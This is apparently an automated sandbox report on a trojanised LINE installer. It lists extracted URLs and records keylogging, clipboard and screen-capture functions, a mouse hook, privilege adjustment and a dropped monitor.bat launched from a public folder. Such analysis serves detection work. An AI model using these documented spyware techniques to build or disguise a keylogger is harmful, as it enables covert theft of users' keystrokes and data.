Source: OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftM
Source: powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://line.naver.jp0
Source: powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop.line-scdn.net/win/bin/real/installer/installer.jsonSoftware
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=en
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=en=
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=es
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=id
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=ja
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=ko
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=th
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=zh-Hant

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: [esc]3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: [esc]3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: [esc]3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: [esc]3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0427E850
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_0427BC70
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8C25C0 GetAsyncKeyState,SendMessageW,GetClientRect,SetScrollPos,3_2_6C8C25C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_0427E4F0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8A43B7 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_6C8A43B7
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88D0FE GetKeyState,GetKeyState,GetKeyState,SendMessageW,3_2_6C88D0FE
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C861100 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,3_2_6C861100
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427B43F ExitWindowsEx,3_2_0427B43F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427B41B ExitWindowsEx,3_2_0427B41B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427B463 ExitWindowsEx,3_2_0427B463
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00404FAA0_2_00404FAA
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0041206B0_2_0041206B
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0041022D0_2_0041022D
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00411F910_2_00411F91
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004C40593_2_004C4059
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004A90003_2_004A9000
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004CA0E73_2_004CA0E7
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004CC1D13_2_004CC1D1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004CA2653_2_004CA265
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004CC2F13_2_004CC2F1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004A97103_2_004A9710
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004BA7D03_2_004BA7D0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004A39C03_2_004A39C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B8B3F3_2_004B8B3F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004C9D023_2_004C9D02
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04276C503_2_04276C50
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04276EE03_2_04276EE0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042724B03_2_042724B0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428E3413_2_0428E341
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042883813_2_04288381
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428DDF03_2_0428DDF0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428D89F3_2_0428D89F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042789003_2_04278900
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428F9FF3_2_0428F9FF
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428EA1D3_2_0428EA1D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C898F4D3_2_6C898F4D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C874F703_2_6C874F70
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C87EF703_2_6C87EF70
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9C2AA03_2_6C9C2AA0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C87EBC03_2_6C87EBC0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8745C03_2_6C8745C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9CA6C43_2_6C9CA6C4
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88462E3_2_6C88462E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8BA0413_2_6C8BA041
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8B21AB3_2_6C8B21AB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88835D3_2_6C88835D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8ABC7D3_2_6C8ABC7D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C951DCD3_2_6C951DCD
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C851ED03_2_6C851ED0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88DB3F3_2_6C88DB3F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8BB44F3_2_6C8BB44F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C85F4703_2_6C85F470
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9335883_2_6C933588
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C89D2F53_2_6C89D2F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_02F3C24018_2_02F3C240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_02F3AF9718_2_02F3AF97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_02F3B1C818_2_02F3B1C8
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: String function: 0040243B appears 37 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C89D750 appears 75 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 004B22C0 appears 53 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C89F515 appears 262 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C8E2FD1 appears 71 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 04284300 appears 32 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C880847 appears 243 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C89F61F appears 44 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C95D33F appears 42 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C88052B appears 63 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C87D770 appears 37 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: String function: 6C89F57E appears 96 times
Source: OdiHmn3pRK.exeStatic PE information: invalid certificate
Source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLineInstaller.exe< vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekwpswnsserver.exe6 vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamensdksetupJ vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLineInstaller.exe< vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1703128868.00000000025C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exeBinary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04277620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_04277620
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04277740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_04277740
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04277B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_04277B70
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04276050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_04276050
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile created: C:\Users\Public\BiliteJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: \office63_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: \office63_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: checkrt3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: cmd=3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: check_mode3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: unregister_mode3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: wake_mode3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: register_mode3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCommand line argument: WinMain3_2_004A9A30
Source: OdiHmn3pRK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
